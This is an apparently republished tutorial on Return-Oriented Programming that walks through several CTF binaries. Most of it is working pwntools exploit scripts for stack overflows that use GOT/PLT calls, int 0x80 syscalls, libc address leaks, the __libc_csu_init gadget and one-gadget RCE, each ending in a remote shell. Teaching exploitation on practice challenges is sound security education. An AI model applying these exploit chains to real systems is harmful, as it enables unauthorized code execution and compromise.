What is ROP technology? 07/09 Update SLTechnology News&Howtos

What is ROP technology?


Shulou(Shulou.com)05/31 Report--

What is ROP, and how is it used? Many newcomers find the technique confusing, so this article explains the idea behind it and walks through several worked examples.

0x00 Background

If a page of memory lacks the writable (W) attribute, we cannot write code to it, and if it lacks the executable (X) attribute, shellcode written to that page cannot run. We will not run that experiment here; while debugging, you can change EIP or the arguments of functions such as read()/scanf()/gets() so that the program writes to or executes from memory without the corresponding attribute, and observe what happens. So how do we check whether an ELF file has RWX memory pages? First, in IDA we can press the Ctrl+S shortcut, during either static analysis or debugging, to list the segments and their permissions.

Alternatively, as in the previous tutorial, use the checksec command that ships with pwntools to check whether the program has an RWX segment. Because the program may call mprotect(), mmap(), or similar functions at run time to change page permissions or allocate RWX pages, both methods can miss such pages.
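Because permissions can change at run time, one complementary check is to inspect the live mappings of the process. The following is a minimal sketch, assuming a Linux target whose /proc/<pid>/maps file is readable. The function name find_rwx_regions and the sample text are illustrative only and are not part of IDA, checksec, or pwntools.

```python
def find_rwx_regions(maps_text):
    """Return (start, end, name) for every mapping that is readable, writable and executable."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        addr_range, perms = fields[0], fields[1]
        if perms.startswith("rwx"):
            start, end = (int(x, 16) for x in addr_range.split("-"))
            name = fields[5] if len(fields) > 5 else ""
            regions.append((start, end, name))
    return regions


# Hypothetical sample in the format of /proc/<pid>/maps
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 1234 /home/user/pwn1
0804a000-0804b000 rw-p 00001000 08:01 1234 /home/user/pwn1
f7ffd000-f7ffe000 rwxp 00000000 00:00 0
ffe00000-ffe21000 rw-p 00000000 00:00 0 [stack]
"""

for start, end, name in find_rwx_regions(SAMPLE_MAPS):
    print("RWX region: %#x-%#x %s" % (start, end, name or "(anonymous)"))
```

On a live process, the same function could be fed the contents of /proc/<pid>/maps after the program has had a chance to call mprotect() or mmap().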

Since attackers can think of writing shellcode into RWX memory pages and executing it, so can defenders, which led to a technique called the NX bit (No eXecute bit). It is a security feature implemented in the CPU that classifies memory pages as holding either data or instructions. Data on pages marked as data pages (such as the stack and the heap) cannot be executed as instructions; that is, those pages have no X attribute. With this protection in place, the earlier approach of writing shellcode directly into memory and executing it no longer works. We therefore need a well-known bypass technique: ROP (Return-Oriented Programming).

As the name implies, ROP chains pieces of code together using the return instruction ret (a series of jmp or call instructions can be used in the same way, which is sometimes called JOP/COP). A program is bound to contain functions, and where there are functions there are ret instructions. The ret instruction is essentially pop eip: it pops the value at the top of the stack and jumps to it as an address. ROP uses a stack overflow to lay out a series of addresses on the stack. Each address points to a gadget, a short run of assembly instructions ending in ret (or jmp/call), and the chain achieves its goal by jumping from one gadget to the next. Because these instructions already live in executable code regions, and what we write to the stack is only addresses, which are data, the technique bypasses NX protection.
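The control flow described above can be modeled with a toy simulator. This is only a sketch of the idea, not real machine code: the gadget addresses (0x1000, 0x2000, 0x3000), the register set, and the helper names are all made up for illustration, and the stack is a Python list whose first element is the top of the stack.

```python
def run_chain(stack, gadgets):
    """Simulate ret-driven control flow: pop an address, run the gadget there, repeat."""
    regs = {"eax": 0, "ebx": 0}
    trace = []
    while stack:
        addr = stack.pop(0)          # ret behaves like pop eip
        if addr not in gadgets:      # jumping to an unknown address would crash
            trace.append("crash at %#x" % addr)
            break
        name, action = gadgets[addr]
        trace.append(name)
        action(regs, stack)          # the gadget body may pop more values
    return regs, trace


def pop_reg(name):
    """Build the body of a 'pop <reg>; ret' gadget."""
    def action(regs, stack):
        regs[name] = stack.pop(0)
    return action


def add_eax_ebx(regs, stack):
    """Body of an 'add eax, ebx; ret' gadget."""
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF


# Hypothetical gadget table: address -> (disassembly, behavior)
GADGETS = {
    0x1000: ("pop eax; ret", pop_reg("eax")),
    0x2000: ("pop ebx; ret", pop_reg("ebx")),
    0x3000: ("add eax, ebx; ret", add_eax_ebx),
}

# Only addresses and data are written to the stack, never instructions.
chain = [0x1000, 40, 0x2000, 2, 0x3000]
regs, trace = run_chain(list(chain), GADGETS)
print(regs["eax"], trace)
```

Each ret hands control to the next address in the list, which is why a payload made purely of data can still compute something.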

0x01 Using ROP to call functions in the GOT

First, let's look at a simple ROP chain on x86. We will show how to call a function that has a GOT entry and control its arguments. Open ~/RedHat 2017-pwn1/pwn1. The main function has an obvious stack overflow:

The variable v1 starts at bp-28h, so it lives on the stack, and the __isoc99_scanf call that reads the input places no limit on its length, so an overly long input overflows the stack.

The program has NX enabled, so we cannot get a shell with shellcode. Following the previous article, the natural idea is to call system("/bin/sh"). So where do we find system and "/bin/sh"?

First, when a dynamically linked program imports a library function, the function has corresponding entries in the GOT and the PLT (a later article explains this in more detail). Jumping to the .got.plt section, we find that the program imports system.

That settles the first question. For the second, a search of the program finds no "/bin/sh" string, but the program does use __isoc99_scanf, which we can call to read "/bin/sh" into the process's memory. Let's start building the ROP chain.

First, where should the "/bin/sh" string go? Pressing Ctrl+S while debugging to view the program's memory segments shows more than 8 bytes of readable, writable memory starting at 0x0804a030. This address is not affected by ASLR, so we can read the string there. Next we need the other argument of __isoc99_scanf, the "%s" format string, which is located at 0x08048629.

Then we use pwntools to get the address of __isoc99_scanf in the PLT. Each PLT entry is a small stub, so hijacking EIP to a function's PLT entry calls that function directly. On x86, arguments are pushed onto the stack from right to left. We can now build the ROP chain.

```python
from pwn import *

context.update(arch='i386', os='linux', timeout=1)
io = remote('172.17.0.3', 10001)
elf = ELF('./pwn1')

scanf_addr = p32(elf.symbols['__isoc99_scanf'])  # PLT entry of __isoc99_scanf
format_s = p32(0x08048629)                       # address of the "%s" format string
binsh_addr = p32(0x0804a030)                     # writable address for "/bin/sh"

shellcode1 = b'A' * 0x34   # padding up to the saved return address
shellcode1 += scanf_addr
shellcode1 += format_s
shellcode1 += binsh_addr

print(io.read())
io.sendline(shellcode1)
io.sendline(b"/bin/sh")
```

Let's test it. Debugging shows that when EIP points to retn, the stack holds what we expect: the top of the stack is the address of __isoc99_scanf in the PLT, followed by the two arguments.

We keep stepping, and after executing inside libc for a while the program reports an error.

Why? Let's review. The call instruction pushes the address of the instruction that follows it onto the stack, and when the called function finishes, its ret instruction pops that address into EIP. Here, however, we jump to __isoc99_scanf directly without going through call, so no return address is pushed. As a result, the function treats format_s, which immediately follows scanf_addr, as its return address, and binsh_addr becomes its first argument.

For comparison, this is the function being called through a call instruction:

```
08048557 mov  [esp+4], eax
0804855B mov  dword ptr [esp], offset unk_8048629
08048562 call __isoc99_scanf
08048567 lea  eax, [esp+18h]
```

Comparing the two ways of calling the function shows that, without the push performed by the call instruction, the arguments read by the callee are misaligned unless we simulate the pushed address ourselves. So we need to improve the ROP chain: a return address must be placed between the function address that overwrites the saved EIP and the function's arguments. Since we still have to call system after scanf has read the string, we make __isoc99_scanf return to the start of main, so the stack overflow can be triggered a second time. In the improved chain, the address of main therefore sits between the PLT address of __isoc99_scanf and its two arguments. Debugging again shows that this time __isoc99_scanf is called successfully and reads the "/bin/sh" string to address 0x0804a030.
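The corrected stack layout can be sketched with the standard library alone. The padding length 0x34 and the addresses of the format string and the writable buffer come from the script above; SCANF_PLT and MAIN_ADDR are hypothetical placeholders, since the article resolves the PLT entry with pwntools and does not state the address of main. The helper names pack32 and call_x86 are also made up for this sketch.

```python
import struct


def pack32(value):
    """Pack a 32-bit little-endian value (a stand-in for pwntools' p32)."""
    return struct.pack("<I", value)


def call_x86(func, ret_addr, *args):
    """Lay out a function address, a fake return address, then its arguments."""
    return pack32(func) + pack32(ret_addr) + b"".join(pack32(a) for a in args)


SCANF_PLT = 0x08048410   # hypothetical PLT address of __isoc99_scanf
MAIN_ADDR = 0x08048531   # hypothetical address of main
FORMAT_S = 0x08048629    # "%s" format string, from the article
BINSH_ADDR = 0x0804a030  # writable buffer, from the article

payload = b"A" * 0x34
payload += call_x86(SCANF_PLT, MAIN_ADDR, FORMAT_S, BINSH_ADDR)
print(payload[0x34:].hex())
```

The only difference from the failing chain is the extra word holding MAIN_ADDR, which occupies the slot where a real call instruction would have pushed its return address.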

At this point the program starts executing main again. Because the state of the stack has changed, we must recalculate the number of bytes needed to reach the return address. We then use a second ROP chain, modeled on the first, to call system("/bin/sh"). The complete script can be found in the corresponding folder and is not discussed here.

Next, let's see how to call a function in the GOT with ROP on 64-bit. Opening ~/bugs bunny ctf 2017-pwn150/pwn150, we quickly find that the overflow is in Hello(). As in the previous example, NX is enabled, so we need the system function and a "/bin/sh" string. main calls a user-defined function named today, which executes system("/bin/date"), so system is available. The "/bin/sh" string is not in the program, but we do find the string "sh", which can also be used to open a shell.

Now that we have the overflow point, the system function, and the string "sh", we can try to open a shell. The first problem is passing arguments. Unlike x86, on x64 the first arguments are normally passed, from left to right, in rdi, rsi, rdx, rcx, r8, and r9, and any further arguments go on the stack (this is the usual convention, though it can differ depending on the calling convention). We therefore need a way to set rdi. Because we control the stack, what ROP calls for is a pop rdi; ret gadget: the first half loads rdi, and the second half jumps to the next piece of code.

Many tools can help us find ROP gadgets, such as the ROP class that comes with pwntools, ROPgadget, rp++, ropeme, and so on. Here I use ROPgadget (https://github.com/JonathanSalwan/ROPgadget).

We specify the binary with ROPgadget --binary and use grep to pick the fragment we want out of all the gadgets it prints; the search reports pop rdi; ret at 0x400883. There is a small trick here. If we look at this address in IDA, there is no instruction at 0x400883: 0x400882 is pop r15, followed by retn at 0x400884. So is this pop rdi a bug in ROPgadget? Not at all. Select 0x400882 and press D to convert it to data, then select 0x400883 and press C to convert it to code.

We can see that pop rdi is actually "part" of pop r15. This confirms once again that assembly instructions are just names for byte sequences that decode to valid opcodes. As long as the bytes are in executable memory and decode to valid opcodes, jumping into the middle of an instruction works fine.
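The overlap is easy to see at the byte level. In x86-64, pop r15 is encoded as 41 5F, pop rdi as 5F, and ret as C3, so the encoding of pop r15; ret contains pop rdi; ret one byte in. The sketch below assumes the three bytes at 0x400882 are exactly this sequence, which matches the addresses shown in IDA above; the variable names are illustrative.

```python
CODE_BASE = 0x400882               # address of pop r15 in the example binary
CODE = bytes([0x41, 0x5F, 0xC3])   # pop r15; ret

POP_RDI_RET = bytes([0x5F, 0xC3])  # pop rdi; ret

# Search for the shorter encoding inside the longer one.
offset = CODE.find(POP_RDI_RET)
gadget_addr = CODE_BASE + offset
print(hex(gadget_addr))
```

Dropping the 0x41 prefix byte is what turns the r15 operand into rdi, which is why gadget finders report an address that IDA's default disassembly does not list.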

Now that everything is in place, we can build the ROP chain. This time we return directly to an existing call system instruction, so the call itself pushes a return address and we do not have to add one to the stack by hand. Debugging the script confirms that we get a shell. First, retn jumps to the gadget pop rdi; ret at 0x400883, where pop rdi loads rdi with 0x4003ef, the address of the "sh" string.

Then retn jumps to call system.
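The layout of this 64-bit chain can be sketched as follows. The gadget address 0x400883 and the string address 0x4003ef come from the text above; PADDING and CALL_SYSTEM are hypothetical placeholders, because the article states neither the distance to the saved return address nor the address of the call system instruction. pack64 is a stand-in for pwntools' p64.

```python
import struct


def pack64(value):
    """Pack a 64-bit little-endian value (a stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


POP_RDI_RET = 0x400883   # pop rdi; ret, from the article
SH_STR = 0x4003ef        # address of the "sh" string, from the article
CALL_SYSTEM = 0x40075f   # hypothetical address of a call system instruction
PADDING = 88             # hypothetical distance to the saved return address

payload = b"A" * PADDING
payload += pack64(POP_RDI_RET)   # first retn lands here
payload += pack64(SH_STR)        # popped into rdi
payload += pack64(CALL_SYSTEM)   # second retn lands on call system
print(payload[PADDING:].hex())
```

No fake return address follows CALL_SYSTEM, because the call instruction pushes its own.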

0x02 Using ROP to invoke int 80h/syscall

The previous section covered one of the simplest ROP scenarios. In practice, however, the target program often does not import system, and we have to reach our goal another way. The first alternative, covered in this section, is to invoke int 80h/syscall through ROP.

int 80h/syscall was introduced in the "system calls" section of the previous article. Let's look at the example ~/Tamu CTF 2018-pwn5/pwn5. The main functionality of this program is implemented in print_beginning(). The function prints a large number of prompts with puts() and printf(), asks us to enter three strings, first_name, last_name, and major, into three global variables, and then asks whether to join the Corps of Cadets. Whichever we choose, we enter a similar menu function in which only option 2 calls change_major(); the other options just print something. Inside change_major() we find a stack overflow.

With the overflow located, we can work out how to get a shell. As noted at the start of this section, the program does not contain system. But running ROPgadget --binary pwn5 | grep "int 0x80" finds a usable gadget.

Recalling the previous article, we can look up the sys_execve call at http://syscalls.kernelgrok.com/, which can also be used to open a shell. This system call needs five registers set: eax = 11 = 0xb, ebx = &("/bin/sh"), ecx = edx = edi = 0. The "/bin/sh" string can be entered beforehand into one of the global variables, which have fixed addresses. Next we use ROPgadget to search for pop eax/ebx/ecx/edx/esi; ret gadgets and find two:

pop eax; pop ebx; pop esi; pop edi; ret
pop edx; pop ecx; pop ebx; ret

We build the ROP chain and the script from these, but debugging shows that the exploit fails: the ROP chain was not read in.

Why is that?

Printing the payload shows that the address 0x080150a in it contains two 0x0a bytes, that is, "\n". When typing input, the Enter key ("\n") marks the end of the input, and the input function here is evidently affected by this control character too, so we need to pick different gadgets. After swapping in other gadgets, the modified script gets a shell.
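Both the register setup and the newline check can be sketched in a few lines. The two gadget shapes and the register values come from the text above; every address below is a hypothetical placeholder, including the deliberately bad one, and the helper names are made up for this sketch.

```python
import struct


def pack32(value):
    """Pack a 32-bit little-endian value (a stand-in for pwntools' p32)."""
    return struct.pack("<I", value)


def execve_chain(pop_eax_ebx_esi_edi, pop_edx_ecx_ebx, int80, binsh):
    """Set eax = 0xb, ebx = &"/bin/sh", ecx = edx = 0, then trigger int 0x80."""
    chain = pack32(pop_eax_ebx_esi_edi)
    chain += pack32(0xb) + pack32(binsh) + pack32(0) + pack32(0)  # eax, ebx, esi, edi
    chain += pack32(pop_edx_ecx_ebx)
    chain += pack32(0) + pack32(0) + pack32(binsh)                # edx, ecx, ebx
    chain += pack32(int80)
    return chain


def find_bad_bytes(payload, bad=b"\n"):
    """Return the offsets of bytes that would end the input early."""
    return [i for i, b in enumerate(bytearray(payload)) if b in bytearray(bad)]


BINSH = 0x080f1a20   # hypothetical fixed address of the global holding "/bin/sh"
INT80 = 0x08071005   # hypothetical address of int 0x80

# A gadget address containing 0x0a bytes truncates the payload...
bad_chain = execve_chain(0x080a0a15, 0x0806f3aa, INT80, BINSH)
# ...so a different gadget with a clean address has to be chosen.
good_chain = execve_chain(0x080bb496, 0x0806f3aa, INT80, BINSH)

print(find_bad_bytes(bad_chain), find_bad_bytes(good_chain))
```

Running a check like this before sending a payload catches the problem without a debugging session. The set of bad bytes depends on the input function, so the bad parameter would need adjusting for other targets.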

0x03 Finding gadgets in a provided libc

Sometimes a pwn challenge also provides the libc used in its environment. In that case, we can leak the run-time address of something in libc, calculate offsets from it to obtain the addresses of system and "/bin/sh", and call system. The example for this section is ~/Security Fest CTF 2016-tvstation/tvstation. It is a relatively simple challenge: besides the three options the program displays, there is a hidden option 4, which prints the address of the system function in memory.

IDA shows that after printing the address, the program calls debug_func(), and inside debug_func() we find the overflow. Since the challenge provides libc and we have already leaked the memory address of system, we can use the command readelf -a to examine libc.so.6_x64.

The output shows that the .text section belongs to the first LOAD segment. The file size of this segment equals its memory size, so all the code is mapped into memory as is and the relative offsets within the code do not change. Because the preceding PHDR and INTERP segments are also mapped as is, the offset of system from the start of the file, as seen in IDA, is the same as its offset from the load base at run time. For example:

In this libc, system starts at 0x456a0, that is, system is 0x456a0 bytes from the beginning of the file.

Debugging the program shows that the address of system in memory is 0x7fb5c8c266a0, and 0x7fb5c8c266a0 - 0x456a0 = 0x7fb5c8be1000, which is the address at which libc is loaded.

So from the leaked address of one libc function we can compute the address at which libc is loaded in memory, and from that the address of any other function we want to jump to.
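The arithmetic can be written as two small helpers. The offset 0x456a0 and the leaked address 0x7fb5c8c266a0 are the values from the example above; the function names and the page-alignment sanity check are additions made for this sketch.

```python
SYSTEM_OFFSET = 0x456a0  # offset of system in this libc, from the article


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Compute the libc load base from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    if base & 0xfff:
        # A load base is page aligned; anything else suggests a wrong libc or offset.
        raise ValueError("unexpected base %#x" % base)
    return base


def rebase(base, offset):
    """Turn a file offset inside libc into a run-time address."""
    return base + offset


leaked_system = 0x7fb5c8c266a0  # value observed while debugging, from the article
base = libc_base_from_leak(leaked_system, SYSTEM_OFFSET)
print(hex(base), hex(rebase(base, SYSTEM_OFFSET)))
```

The alignment check is a cheap way to notice that the libc on the target differs from the one used to look up offsets.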

libc also contains the string "/bin/sh", located in the .rodata section. By the same principle, we can compute the string's address from its offset from the start of libc.

libc also contains a pop rdi; ret gadget for passing the argument. With these pieces we can write the following script:

```python
#!/usr/bin/python
#coding:utf-8
from pwn import *

io = remote('172.17.0.2', 10001)
io.recvuntil(b":")
io.sendline(b'4')                     # jump to the hidden option
io.recvuntil(b"@0x")
system_addr = int(io.recv(12), 16)    # read the printed address of system in memory
libc_start = system_addr - 0x456a0    # compute the load address of libc in memory
pop_rdi_addr = libc_start + 0x1fd7a   # address of pop rdi; ret in memory, used to pass system's argument
binsh_addr = libc_start + 0x18ac40    # address of the "/bin/sh" string in memory

payload = b""
payload += b'A' * 40                  # padding
payload += p64(pop_rdi_addr)          # pop rdi; ret
payload += p64(binsh_addr)            # argument for system
payload += p64(system_addr)           # call system() to execute system("/bin/sh")

io.sendline(payload)
io.interactive()
```

0x04 Some special gadgets

This section looks at two special gadgets. The first, often called the universal gadget, is usually found in __libc_csu_init in x64 ELF programs. It consists of two pieces: one that pops rbx, rbp, r12, r13, r14, and r15 from the stack and returns, and one that executes mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8].

In x64 ELF programs, arguments are normally passed in the order rdi, rsi, rdx, rcx, r8, r9, then the stack. The first piece lets us set rbx, rbp, and r12-r15; the second piece then copies the values already loaded into those registers into rdx, rsi, and edi, and finally calls the address stored at r12+rbx*8. When suitable gadgets are hard to find, this pair makes it quick to construct a ROP chain. Note that when using the universal gadget you must set rbp = 1, because call qword ptr [r12+rbx*8] is followed by add rbx, 1; cmp rbx, rbp; jnz xxxxxx. We normally set rbx = 0 so that r12+rbx*8 = r12, which means rbx becomes 1 after the call returns. If rbp != 1 at that point, jnz jumps back and the call is made again, which may cause a segmentation fault. So how is this gadget used? Let's look at the example ~/LCTF 2016-pwn100/pwn100.

This example provides libc, and the overflow point is obvious, at 0x40063d. All we need to do is leak the address of a function through its GOT entry and then calculate the offset to system. The first part of the script is simple, so we will not explain it.

```python
#!/usr/bin/python
#coding:utf-8
from pwn import *

io = remote("172.17.0.3", 10001)
elf = ELF("./pwn100")

puts_addr = elf.plt['puts']
read_got = elf.got['read']

start_addr = 0x400550
pop_rdi = 0x400763
universal_gadget1 = 0x40075a  # universal gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; retn
universal_gadget2 = 0x400740  # universal gadget 2: mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8]
binsh_addr = 0x60107c         # .bss holds the FILE structures of STDIN and STDOUT; modifying them crashes the program

payload = b"A" * 72                 # padding
payload += p64(pop_rdi)
payload += p64(read_got)
payload += p64(puts_addr)
payload += p64(start_addr)          # jump to start to restore the stack
payload = payload.ljust(200, b"B")  # padding
io.send(payload)
io.recvuntil(b'bye~\n')
read_addr = u64(io.recv()[:-1].ljust(8, b'\x00'))
log.info("read_addr = %#x", read_addr)
system_addr = read_addr - 0xb31e0
log.info("system_addr = %#x", system_addr)
```

To demonstrate the universal gadget, we read the "/bin/sh\x00" string in again by calling read, rather than using the string's offset in libc directly. First we set up the stack as the universal gadget requires.

```python
payload = b"A" * 72                # padding
payload += p64(universal_gadget1)  # universal gadget 1
payload += p64(0)                  # rbx = 0
payload += p64(1)                  # rbp = 1, so the check after the call in universal gadget 2 falls through
payload += p64(read_got)           # r12 = GOT entry of read, which holds read's real address; called directly through call
payload += p64(8)                  # r13 = 8, the number of bytes read should read; gadget 2 moves it to rdx
payload += p64(binsh_addr)         # r14 = address where read stores "/bin/sh"; gadget 2 moves it to rsi
payload += p64(0)                  # r15 = 0, read's fd argument (STDIN); gadget 2 moves it to edi
payload += p64(universal_gadget2)  # universal gadget 2
```

Can we put the return address directly after this payload? No. Let's look again at what happens after universal_gadget2.

Because of the values we set, the code above runs only once, and execution then falls through to loc_400756 below. That code performs add rsp, 8 followed by six pops, consuming 56 bytes of stack in total, so we must supply 56 bytes of filler before the address that the final retn jumps to.

```python
payload += b'\x00' * 56             # gadget 2's check falls through into gadget 1; fill the stack space it consumes
payload += p64(start_addr)          # jump to start to restore the stack
payload = payload.ljust(200, b"B")  # padding

# What follows is the routine way to get a shell
io.send(payload)
io.recvuntil(b'bye~\n')
io.send(b"/bin/sh\x00")             # the payload above called read; send it the string "/bin/sh\x00"

payload = b"A" * 72                 # padding
payload += p64(pop_rdi)             # pass the argument to system
payload += p64(binsh_addr)          # rdi = &("/bin/sh\x00")
payload += p64(system_addr)         # call system to execute system("/bin/sh")
payload = payload.ljust(200, b"B")  # padding
io.send(payload)
io.interactive()
```
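The universal-gadget sequence can also be wrapped in a reusable helper. This is a sketch using only the standard library: the gadget addresses, the buffer address, and the start address are the ones from the script above, while READ_GOT is a hypothetical placeholder (the script obtains it from the ELF file) and the names csu_call and pack64 are made up for illustration.

```python
import struct


def pack64(value):
    """Pack a 64-bit little-endian value (a stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


def csu_call(gadget1, gadget2, func_ptr, edi, rsi, rdx, ret_addr):
    """Build a chain that calls *func_ptr(edi, rsi, rdx) and then returns to ret_addr."""
    chain = pack64(gadget1)
    chain += pack64(0)         # rbx = 0, so the call target is [r12]
    chain += pack64(1)         # rbp = 1, so the jnz after the call falls through
    chain += pack64(func_ptr)  # r12 = address of a pointer to the function
    chain += pack64(rdx)       # r13 is moved to rdx
    chain += pack64(rsi)       # r14 is moved to rsi
    chain += pack64(edi)       # r15d is moved to edi
    chain += pack64(gadget2)
    chain += b"\x00" * 56      # add rsp, 8 plus six pops after the call
    chain += pack64(ret_addr)
    return chain


GADGET1 = 0x40075a     # from the article
GADGET2 = 0x400740     # from the article
READ_GOT = 0x601028    # hypothetical GOT entry of read
BINSH_ADDR = 0x60107c  # from the article
START_ADDR = 0x400550  # from the article

# read(0, BINSH_ADDR, 8), then return to start
chain = csu_call(GADGET1, GADGET2, READ_GOT, 0, BINSH_ADDR, 8, START_ADDR)
print(len(chain))
```

Because edi is loaded from r15d, only the low 32 bits of the first argument can be controlled this way, which is enough for a file descriptor but not for a 64-bit pointer.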

The second gadget is often called a one-gadget RCE. As the name implies, a single gadget is enough to execute code remotely, that is, to get a shell. Let's demonstrate its power with the example ~/TJCTF 2016-oneshot/oneshot.

To use this gadget, we need the libc of the target environment and the tool one_gadget (https://github.com/david942j/one_gadget). This program has no stack overflow, and its code is very simple.

In the code in the red box, the address rbp+var_8 is moved into rsi as the second argument of __isoc99_scanf, so the input is stored there. The value at rbp+var_8 is then loaded into rax, copied to rdx, and finally executed through call rdx. In other words, the number we enter is used as the target address of a call. Since we can only control 4 bytes, we need a one-gadget RCE to get a shell. Running one_gadget on the libc finds several gadgets, each with constraints. We choose the first one, which requires rax = 0, and build the script for debugging:

```python
#!/usr/bin/python
#coding:utf-8
from pwn import *

one_gadget_rce = 0x45526
# one_gadget libc.so.6_x64
# 0x45526 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL
setbuf_addr = 0x77f50
setbuf_got = 0x600ae0

io = remote("172.17.0.2", 10001)
io.sendline(str(setbuf_got).encode())
io.recvuntil(b"Value:")
setbuf_memory_addr = int(io.recv()[:18], 16)  # leak the address of setbuf in memory by printing its GOT entry
io.sendline(str(setbuf_memory_addr - (setbuf_addr - one_gadget_rce)).encode())  # compute the address of one_gadget_rce in memory from the offset
io.interactive()
```

When execution reaches call rdx, rax = 0, so the constraint is satisfied.

The shell is obtained successfully.

